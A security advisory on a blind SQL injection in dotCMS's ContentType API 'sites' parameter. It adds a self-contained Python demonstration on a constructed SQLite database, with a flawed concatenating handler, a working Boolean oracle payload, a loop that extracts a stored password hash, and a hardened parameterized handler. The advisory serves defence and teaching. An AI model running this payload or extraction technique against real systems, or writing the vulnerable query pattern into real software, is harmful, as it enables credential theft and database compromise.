dotCMS
cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*
- >= 24.03.22
A Boolean-based blind SQL injection vulnerability has been identified in the dotCMS ContentType API endpoint (/api/v1/contenttype) in versions 24.03.22 and later. The flaw is in the sites query parameter, which accepts a comma-separated list of site identifiers. Each identifier is concatenated directly into a SQL query without parameterization or validation, so an authenticated attacker with low privileges can extract data from the database, escalate privileges, or cause a denial of service. The vulnerability was verified with SQLMap, which demonstrated full database exfiltration and disruption of service through crafted payloads.
Because the injection is Boolean-based and blind, the attacker learns one true/false answer per request from the difference in the endpoint's response and recovers data by iterating such probes. Demonstrated impact includes exfiltration of database contents such as user account password hashes, resetting administrator credentials to escalate privileges, and denial of service by overloading the database with recursive SQL queries.
Users are advised to upgrade to dotCMS 25.08.14, 25.07.10-1v2 LTS, 24.12.27v10 LTS, or 24.04.24v21 LTS. The fix replaces the string concatenation with parameterized query handling for the sites input and adds input validation and sanitization of each identifier; the additional Web Application Firewall rules that flag SQL-like patterns in the parameter are defense in depth, not the primary control.
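The following is an added, self-contained example and is not dotCMS code: it reproduces the pattern the advisory describes (a comma-separated list of site identifiers quoted and concatenated into an IN (...) clause), shows how a Boolean-based blind oracle built on that flaw leaks a stored hash character by character, and puts the hardened handler beside it. The schema, table names, data, the identifier pattern and the sample hash value are all constructed for the demonstration; dotCMS's real tables and identifier format may differ. Because the flawed handler splits its input on commas, the probes deliberately avoid commas (prefix matching with LIKE instead of substr with arguments), which is the kind of constraint SQLMap works around for you automatically.

```python
import re
import sqlite3

# ASSUMPTION: site identifiers are short alphanumeric/hyphen tokens. dotCMS's real
# identifier format may differ; tighten this pattern to match it.
ID_PATTERN = re.compile(r"[A-Za-z0-9-]{1,64}")
HEX = "0123456789abcdef"


def build_db() -> sqlite3.Connection:
    """Constructed stand-in schema and data (not dotCMS's tables)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE content_type (id TEXT, name TEXT, site_id TEXT);
        CREATE TABLE user_ (user_id TEXT, password_hash TEXT);
        INSERT INTO content_type VALUES ('ct1', 'Blog', 'site-a');
        INSERT INTO content_type VALUES ('ct2', 'Page', 'site-a');
        INSERT INTO content_type VALUES ('ct3', 'News', 'site-b');
        INSERT INTO user_ VALUES ('admin', 'a9f3c2');  -- constructed hash value
        """
    )
    return conn


def list_types_vulnerable(conn: sqlite3.Connection, sites_param: str) -> list[str]:
    """Flawed handler: quotes each comma-separated item and concatenates it into the SQL."""
    quoted = ",".join(f"'{s}'" for s in sites_param.split(","))
    sql = f"SELECT name FROM content_type WHERE site_id IN ({quoted}) ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def list_types_fixed(conn: sqlite3.Connection, sites_param: str) -> list[str]:
    """Hardened handler: validate every item, then bind one placeholder per item."""
    ids = [s.strip() for s in sites_param.split(",") if s.strip()]
    rejected = [s for s in ids if not ID_PATTERN.fullmatch(s)]
    if rejected:
        raise ValueError(f"rejected site identifiers: {rejected}")
    if not ids:
        return []
    placeholders = ",".join("?" for _ in ids)
    sql = f"SELECT name FROM content_type WHERE site_id IN ({placeholders}) ORDER BY id"
    return [row[0] for row in conn.execute(sql, ids)]


def oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Boolean-based blind probe against the flawed handler.

    The payload closes the IN (...) list with a known-good id, appends the
    attacker's condition and re-balances the trailing quote the handler adds:
        ... WHERE site_id IN ('site-a') AND (<condition>) AND ('1'='1')
    A non-empty response means the condition was true. The condition must not
    contain commas, because the handler splits the parameter on them first.
    """
    payload = f"site-a') AND ({condition}) AND ('1'='1"
    return len(list_types_vulnerable(conn, payload)) > 0


def extract_hash(conn: sqlite3.Connection, user_id: str) -> str:
    """Recover a password hash one character at a time through the oracle."""
    subq = f"(SELECT password_hash FROM user_ WHERE user_id='{user_id}')"
    length = next(n for n in range(1, 129) if oracle(conn, f"length({subq})={n}"))
    recovered = ""
    for _ in range(length):
        for ch in HEX:  # ASSUMPTION: the stored hash is lowercase hex
            # Prefix match with LIKE avoids commas; each hit fixes one more character.
            if oracle(conn, f"{subq} LIKE '{recovered}{ch}%'"):
                recovered += ch
                break
    return recovered


def fixed_rejects_payload(conn: sqlite3.Connection) -> bool:
    """The same payload fails validation against the hardened handler."""
    try:
        list_types_fixed(conn, "site-a') AND (1=1) AND ('1'='1")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print("legit request:", list_types_vulnerable(db, "site-a,site-b"))
    print("oracle 1=1:", oracle(db, "1=1"), "| oracle 1=2:", oracle(db, "1=2"))
    print("leaked admin hash:", extract_hash(db, "admin"))
    print("fixed handler, legit request:", list_types_fixed(db, "site-a,site-b"))
    print("fixed handler rejects payload:", fixed_rejects_payload(db))
```

Two properties of the hardened handler matter independently: binding one placeholder per list item means the database never parses attacker text as SQL, and the allow-list validation rejects the payload before a query is even built. Either alone closes the injection; keeping both is cheap and makes the rejection visible in logs.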